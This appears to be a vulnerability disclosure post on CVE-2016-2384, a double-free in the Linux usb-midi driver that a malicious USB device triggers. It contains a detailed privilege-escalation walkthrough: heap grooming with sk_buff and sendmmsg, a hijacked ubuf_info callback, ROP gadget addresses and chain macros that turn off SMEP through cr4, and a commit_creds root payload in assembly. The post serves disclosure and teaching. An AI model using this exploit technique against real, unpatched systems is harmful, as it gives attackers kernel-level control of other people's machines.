Overview

This post describes an exploitable vulnerability (CVE-2016-2384) in the usb-midi Linux kernel driver. The vulnerability is present only if the usb-midi module is enabled, but as far as I can see many modern distributions do this. The bug has been fixed upstream.

The vulnerability can be exploited in two ways:

  1. Denial of service. Requires physical access (ability to plug in a malicious USB device). All the kernel versions seem to be vulnerable to this attack. I managed to cause a kernel panic on real machines with the following kernels: Ubuntu 14.04 (3.19.0-49-generic), Linux Mint 17.3 (3.19.0-32-generic), Fedora 22 (4.1.5-200.fe22.x86_64) and CentOS 6 (2.6.32-584.12.2.e16.x86_64).

  2. Arbitrary code execution with ring 0 privileges (and therefore a privilege escalation). Requires both physical and local access (ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user). All the kernel versions starting from v3.0 seem to be vulnerable to this attack. I managed to gain root privileges on real machines with the following kernels: Ubuntu 14.04 (3.19.0-49-generic), Linux Mint 17.3 (3.19.0-32-generic) and Fedora 22 (4.1.5-200.fe22.x86_64). All machines had SMEP turned on, but didn't have SMAP.

A proof-of-concept exploit (poc.c, poc.py) is provided for both types of attacks. The provided exploit uses a Facedancer21 board to physically emulate the malicious USB device. The provided exploit bypasses SMEP, but doesn't bypass SMAP (though it might be possible to do). It has about 50% success rate (the kernel crashes on failure), but this can probably be improved. Check out the demo video.

It should actually be possible to make the entire exploit for the arbitrary code execution hardware only and therefore eliminate the local access requirement, but this approach wasn't thoroughly investigated.

The vulnerability was found with KASAN (KernelAddressSanitizer, a kernel memory error detector) and vUSBf (a virtual usb fuzzer).

The bug

The issue with the usb-midi driver is a double-free of a snd_usb_midi object, which occurs when a Midiman USB device with invalid number of endpoints is plugged in. I used a Facedancer21 board to physically emulate such USB device. If you don't know what a USB endpoint is or if you're overall interested in how the USB protocol works, I suggest reading up on it here.

When a USB device is plugged in, the kernel determines which driver is responsible for this device and calls the corresponding probe() function. During probing the driver performs various initialization of the device. When probing our crafted USB MIDI device everything goes alright until the end of snd_usbmidi_create() when the following code is executed:

if (quirk && quirk->type == QUIRK_MIDI_MIDIMAN)
        err = snd_usbmidi_create_endpoints_midiman(umidi, &endpoints[0]);
else
        err = snd_usbmidi_create_endpoints(umidi, endpoints);
if (err < 0) {
        snd_usbmidi_free(umidi);
        return err;
}

Since we're using a Midiman device, the first if branch is executed and snd_usbmidi_create_endpoints_midiman() gets called. This function performs initialization of USB endpoints specific to Midiman devices. If we provide an invalid number of endpoints in the USB device descriptior (say zero), then snd_usbmidi_create_endpoints_midiman() fails on the following check:

if (intfd->bNumEndpoints < (endpoint->out_cables > 0x0001 ? 5 : 3)) {
        dev_dbg(&umidi->dev->dev, "not enough endpoints\n");
        return -ENOENT;
}

After that snd_usbmidi_free() gets called, which frees the snd_usb_midi object. Then, since the device probing failed, various clean up routines are invoked, and one of them calls snd_usbmidi_free() again on the same object. This results in a double free. Here is the KASAN report with the exact stack traces (line numbers are for the upstream kernel v4.4). KASAN reports it as a use-after-free, since the code uses the snd_usb_midi object in between the two kfree()s and that is what KASAN detects.

The bug is only triggered with the device IDs that are listed with QUIRK_MIDI_MIDIMAN in sound/usb/quirks-table.h. There's also an else branch which could fail, but as pointed out by one of the kernel developers, for other USB MIDI devices, the USB descriptors are checked earlier, and the only way that snd_usbmidi_create_endpoints() could fail would be to run out of memory.

Here is the descriptor of the USB device I used to trigger the bug. The important parameters are: idVendor = 0x0763 (Midiman), idProduct = 0x1002 (MidiSport 2x2) and one of the configurations should have an interface with bInterfaceClass = 255 and zero endpoints. The idProduct might be any of the supported Midiman devices.

Exploitation

Now let's see how we can exploit this.

Denial of service

Causing a denial of service is fairly easy. A double-free causes quite a harmful corruption of the kernel allocator. So the only thing we need to do is to connect the USB device (maybe a few times) and the kernel crashes. It requires only physical access to the machine. Here is a script meant to be used with a Facedancer21 to emulate the USB device described above.

Arbitrary code execution

Executing arbitrary code is also possible, but is more difficult to achieve. Here's how I did it, though it's obviously not the only possible way. Overall, I turned this double-free into a racy-use-after-free and managed to overwrite an object with a pointer to another object which holds a function pointer, while the first object is still being used by the kernel. Let's go through it step by step.

If you have no idea how the linux kernel slab allocators work or you don't know what kmalloc() caches are, read up on it somewhere (for example here, though it's somewhat outdated).

A snd_usb_midi object is allocated by the kernel via kmalloc() and falls into the kmalloc-512 cache. Each time a network packet is sent an sk_buff object is created by the kernel. It's just happens that any sk_buff object is also allocated via kmalloc() and might fall into kmalloc-512 cache depending on the packet size (for example it happens with 128-bytes packets).

Using the double-free discribed above it's possible to cause a use-after-free on an sk_buff. Imagine that an sk_buff object is allocated in between the two kfree()s of the snd_usb_midi object and placed into the same slab object. In that case, if this slab object is allocated again before it was freed as an sk_buff, it can be overwritten. That's what we're going to do.

What do we get from overwriting an sk_buff? Turns out that whenever an sk_buff is allocated, an skb_shared_info struct is placed at the end of it. Let's look at the skb_shared_info definition closely:

struct skb_shared_info {
        unsigned char   nr_frags;
        __u8            tx_flags;
        unsigned short  gso_size;
        unsigned short  gso_segs;
        unsigned short  gso_type;
        struct sk_buff  *frag_list;
        struct skb_shared_hwtstamps hwtstamps;
        u32             tskey;
        __be32          ip6_frag_id;
        atomic_t        dataref;
        void *          destructor_arg;
        skb_frag_t      frags[MAX_SKB_FRAGS];
};

An skb_shared_info struct has a destructor_arg field, which points to a ubuf_info struct (though it's declared as a void * pointer). Let's take a look at the definition of the ubuf_info:

struct ubuf_info {
        void (*callback)(struct ubuf_info *, bool zerocopy_success);
        void *ctx;
        unsigned long desc;
};

Here we go, it contains a function pointer, which is probably called at some point.

So we want to overwrite the destructor_arg field in an skb_shared_info of an sk_buff and make it point to a crafted ubuf_info which has the callback field set to whatever we want. For that we need to be able to do the following three things from the userspace (by calling syscalls from a binary running as an non-privileged user for example):

  1. Allocate a 512-bytes sk_buff
  2. Allocate a 512-bytes object via kmalloc() with controlled data
  3. Trigger the callback

As I mentioned before, a 512-bytes sk_buff is allocated whenever a 128-bytes packet is sent. The allocated sk_buff won't be freed until either the packet is delivered, failed to be delivered or the socket is closed. So we can just create a couple of sockets and send say a UDP packet from one to the other.

Next, we need a way to allocate 512-bytes object with controlled data. There's actually a way to allocate objects from the userspace with both size and data controlled. It can be done via sending control messages on a socket with the sendmmsg() syscall. During sendmmsg() the kernel will allocate a buffer for the control message via kmalloc() and copy the message there.

Now, we need a way to trigger the callback. It actually gets called when the corresponding sk_buff is being freed:

static void skb_release_data(struct sk_buff *skb)
{
        struct skb_shared_info *shinfo = skb_shinfo(skb);
        int i;

        if (skb->cloned &&
            atomic_sub_return(skb->nohdr ? (1 << SKB_DATAREF_SHIFT) + 1 : 1,
                              &shinfo->dataref))
                return;

        for (i = 0; i < shinfo->nr_frags; i++)
                __skb_frag_unref(&shinfo->frags[i]);

        /*
         * If skb buf is from userspace, we need to notify the caller
         * the lower device DMA has done;
         */
        if (shinfo->tx_flags & SKBTX_DEV_ZEROCOPY) {
                struct ubuf_info *uarg;

                uarg = shinfo->destructor_arg;
                if (uarg->callback)
                        uarg->callback(uarg, true);
        }

        if (shinfo->frag_list)
                kfree_skb_list(shinfo->frag_list);

        skb_free_head(skb);
}

As you can see, it only get's called when shinfo->tx_flags has the SKBTX_DEV_ZEROCOPY flag set, but we can overwrite it with the desired value as well as the destructor_arg.

So what we're going for is the following sequence of events:

  1. snd_usb_midi freed
  2. sk_buff allocated on the same place when sending a packet on a socket
  3. snd_usb_midi freed again, therefore freeing the sk_buff, which is actually still being used
  4. a chunk of memory is allocated by sendmmsg() on the same place, overwriting the skb_shared_info in the sk_buff
  5. sk_buff freed, therefore triggering the callback

This can be achieved by opening multiple sockets and sending 128-bytes packets as well as control messages in a loop and connecting the usb device at the same time. This racy approach really relies on a set of kmalloc() and kfree() calls that happen in the right order, but the exploit I wrote seems to be working with fairly good success rate. As a result we control the callback value, we can point it to any payload, which is going to be executed with kernel privileges. By using a classic commit_creds(prepare_kernel_cred(0)) payload we can gain root access.

Where do we allocate the ubuf_info struct, which actually holds the callback pointer? The most simple way is to allocate it in the userspace (as a global variable or with mmap()). The same goes for the payload that gets executed (however we can use ROP, read below).

The version v3.0+ requirement comes from the fact the the callback field wasn't present before v3.0. However, there might be some other in-kernel objects of size 512 with function pointers in them, which can be used for exploitation.

Kernel hardening

The Linux kernel has support for a few hardening features that make exploitation more difficult. For instance there are SMEP (Supervisor Mode Execution Protection) and SMAP (Supervisor Mode Access Prevention). SMEP causes an oops whenever the kernel tries to execute code from the userspace memory and SMAP causes an oops whenever the kernel tries to access the userspace memory directly.

SMAP and SMEP are both CPU features which require support on the kernel side. Which basically means that each of them is enabled only if:

  1. The CPU supports it
  2. The kernel supports it
  3. It's enabled in the kernel configuration

The kernel has SMEP support since v3.0 and SMAP support since v3.7 and they are both usually enabled in the modern distributions. However, while Intel's CPU received the SMEP support a few years ago (since the Ivy Bridge architecture), the SMAP support was added quite recently (starting from the Broadwell architecture) and therefore not many CPUs out there have it.

If you take a close look at the exploitation process I described above, you can see that both SMEP and SMAP will protect from the code execution. SMEP will detect that we execute code from the userspace when the callback is called and SMAP will detect that ubuf_info is being accessed from the userspace.

Another existing Linux kernel hardening technique is KASLR (Kernel Address-Space Layout Randomization). The kernel supports it starting from v3.14, but at the moment it's disabled by default in most modern distributions.

SMEP bypass

I'm going to show how to bypass SMEP and make the exploitation possible on many modern CPUs with modern kernels. The classic way to do it is to use in-kernel ROP (Return-Oriented Programming) and that's what we're going to do. If you're not familiar with ROP, I suggest reading up it on somewhere (there are many tutorials available). Here I'm going to assume that our CPU has x86-64 architecture.

Overall, I'm going to use a xchg eax, esp gadget to set stack pointer to a particular address in the userspace to control the stack, disable SMEP via ROP, restore stack pointer and then jump to a commit_creds(prepare_kernel_cred(0)) payload, which resides in the userspace memory. Let's go through it step by step.

First, let's take a look at the disassembly around the code that calls the callback:

                if (uarg->callback)
ffffffff816c39b9:       48 8b 07                mov    (%rdi),%rax
ffffffff816c39bc:       48 85 c0                test   %rax,%rax
ffffffff816c39bf:       74 07                   je     ffffffff816c39c8 <skb_release_data+0x98>
                        uarg->callback(uarg, true);
ffffffff816c39c1:       be 01 00 00 00          mov    $0x1,%esi
ffffffff816c39c6:       ff d0                   callq  *%rax

As we can see, the address of the callback is stored in the rax register and then callq is used to call it. Let's imagine that the callback contains the address of the xchg eax, esp ; ret gadget. In that case after callq *%rax this gadget will get executed. It will swap the values of eax and esp and at the same time zero out the higher 32 bits of rax and rsp (see this for details). Therefore, if the gadget address is 0xffffffff8100008a then the new rsp value will be 0x000000008100008a, which is a userspace address. If we mmap() this address in advance, we will get control of the stack. As a side note, our fake stack will reside in the userspace, and that's another thing that SMAP will detect.

Now we can put our ROP payload into this stack and we're good. There's an issue though. Suppose our ROP payload got executed. After that we need a way to restore the stack pointer back to it's original value and return to where the callback was called from. We can't just do xchg eax, esp again, since after the first xchg we lost the higher 32 bits of the original rsp value.

However, there's a way to restore these 32 bits. If you think about it, rbp has a very close value to rsp, since rsp is saved into rbp in each function's prologue, and the chances that they have the same higher 32 bits are insanely high. So we can just use the higher 32 bits of rbp as the higher 32 bits of rsp and the eax value after the xchg instruction as the lower 32 bits of rsp. We better save the eax value right after the xchg, so we can use the rax register in the ROP payload. That's no problem, we can just save it into some userspace address with the first few ROP gadgets in the payload. That's actually another place where we access the userspace, which can be detected by SMAP.

I used the following ROP gadgets to save the eax value:

0xffffffff8118991d : pop rdi ; ret
0xffffffff810fff17 : mov dword ptr [rdi], eax ; ret

So the first part of the payload looks like:

#define POP_RDI_RET               0xffffffff8118991dL
#define MOV_DWORD_PTR_RDI_EAX_RET 0xffffffff810fff17L

#define CHAIN_SAVE_EAX                  \
  *stack++ = POP_RDI_RET;               \
  *stack++ = (uint64_t)&saved_eax;      \
  *stack++ = MOV_DWORD_PTR_RDI_EAX_RET;

Now, that we have the eax saved, we can do something more useful. For instance disable SMEP. Whether SMEP if enabled or not is controlled by the 20th bit of the cr4 register. There are a few gadgets in the kernel which allow us to set the cr4 value. I used these:

0xffffffff8118991d : pop rdi ; ret
0xffffffff8105b8f0 : push rbp ; mov rbp, rsp ; mov cr4, rdi ; pop rbp ; ret

Note, that the second gadget also pushes and then pops back the rbp register. If we omit the push, then we will end up with garbage in rbp.

As a result, the next part of the payload looks like:

#define POP_RDI_RET               0xffffffff8118991dL
#define MOV_CR4_RDI_RET           0xffffffff8105b8f0L
#define CR4_DESIRED_VALUE         0x407f0

#define CHAIN_SET_CR4                   \
  *stack++ = POP_RDI_RET;               \
  *stack++ = CR4_DESIRED_VALUE;         \
  *stack++ = MOV_CR4_RDI_RET;           

Now that we disabled SMEP, we can jump to a userspace payload, so we wouldn't need to mess around with ROP anymore. Here are the gadgets the I used:

0xffffffff810053bc : pop rcx ; ret
0xffffffff81040a90 : jmp rcx

And here is the last part of the ROP payload:

#define POP_RCX_RET               0xffffffff810053bcL
#define JMP_RCX                   0xffffffff81040a90L

#define CHAIN_JMP_PAYLOAD               \
  *stack++ = POP_RCX_RET;               \
  *stack++ = (uint64_t)&payload;        \
  *stack++ = JMP_RCX;                   \

We can write the userspace payload in assembly, which is much easier than doing ROP. Here's the payload that I used:

// Unfortunately GCC does not support `__atribute__((naked))` on x86, which
// can be used to omit a function's prologue, so I had to use this weird
// wrapper hack as a workaround. Note: Clang does support it, which means it
// has better support of GCC attributes than GCC itself. Funny.
void wrapper() {
  asm volatile ("                         \n\
    payload:                              \n\
      movq %%rbp, %%rax                   \n\
      movq $0xffffffff00000000, %%rdx     \n\
      andq %%rdx, %%rax                   \n\
      movq %0, %%rdx                      \n\
      addq %%rdx, %%rax                   \n\
      movq %%rax, %%rsp                   \n\
      jmp get_root                        \n\
  " : : "m"(saved_eax) : );
}

void payload();

The payload first restores rsp using rbp and the saved eax and then jumps to a get_root() payload, which does commit_creds(prepare_kernel_cred(0)). There's a reason why the rsp value is restored first. That's because the current kernel thread can easily get rescheduled during get_root() by the kernel and, since the structure that describes a kernel thread is stored at the end of it's stack, the kernel won't find it there and will crash.

After the get_root() payload gets executed, the kernel returns to where the payload was called from, since the last return address was put by callq *%rax on the original stack. And that's it. We have successfully bypassed SMEP and got root privileges. Here is a demo video. Woohoo!

I used ROPgadget to extract the gadgets. All of the used gadgets seem to be present in all of the stock kernel binaries I looked at (except for jmp rcx, but it's easily replaceable). Note, that gadgets shouldn't be extracted from the .init.text section of a kernel binary, since the code from there gets overwritten after the kernel is done booting.

Initially I was looking for something like xchg rax, rsp, so I wouldn't need to mess around with restoring rsp that much, but it seems that this kind of gadgets is not present in the kernel binaries.

Due to the fact, that slab objects are sometimes cached in a per-cpu list, it's better to run a few instances of the binary. The number is better to be equal or greater then the number of the CPU cores. In that case it's highly probable that at least one of the binaries will be scheduled on the same CPU that performs the probing and therefore allocate per-cpu cached objects.

A set of links to talks about various USB attacks and fuzzing: